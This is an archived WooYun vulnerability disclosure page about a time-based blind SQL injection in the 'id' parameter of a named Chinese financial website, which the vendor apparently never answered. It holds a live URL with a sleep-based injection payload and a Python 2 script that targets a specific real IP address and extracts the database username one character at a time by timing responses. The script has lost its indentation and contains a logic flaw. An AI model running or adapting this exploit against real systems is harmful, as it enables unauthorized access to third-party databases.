当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166865

漏洞标题:大金融财富网SQL注入(附验证脚本)

相关厂商:大金融财富网

漏洞作者: 路人甲

提交时间:2016-01-04 12:17

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT~~~

详细说明:

http://http://www.djr158.com/account?id='XOR(if(now()=sysdate(),sleep(if(length(user())=15,5,0)),0))OR'&mid=31&son_id=53


参数id存在注入:

1.png


漏洞证明:

2.png


#Encoding utf-8
import httplib
import urllib
import sys
import time
import string
import random
headers = {
'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads='abcdefghijklmnopqrstuvwxyz0123456789@_.'
print 'Start to retrive MySQL user:'
user=''
for i in range(1,15):
for payload in payloads:
time.sleep(1)
try:
conn=httplib.HTTPConnection('112.90.157.141',timeout=5)
s="XOR(if(now()=sysdate(),sleep(if(ascii(mid(user(),%s,1))=%s,10,0)),0))OR'" % (i, ord(payload))
params="id=';" + urllib.quote(s)
conn.request(method='GET',url='/account?' + params,headers=headers)
html_doc=conn.getresponse().read()
conn.close()
print '.',
except Exception , e:
user += payload
print '\nIn progress]',user
break
print '\n[Done] User is:',user

修复方案:

过滤危险字符。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝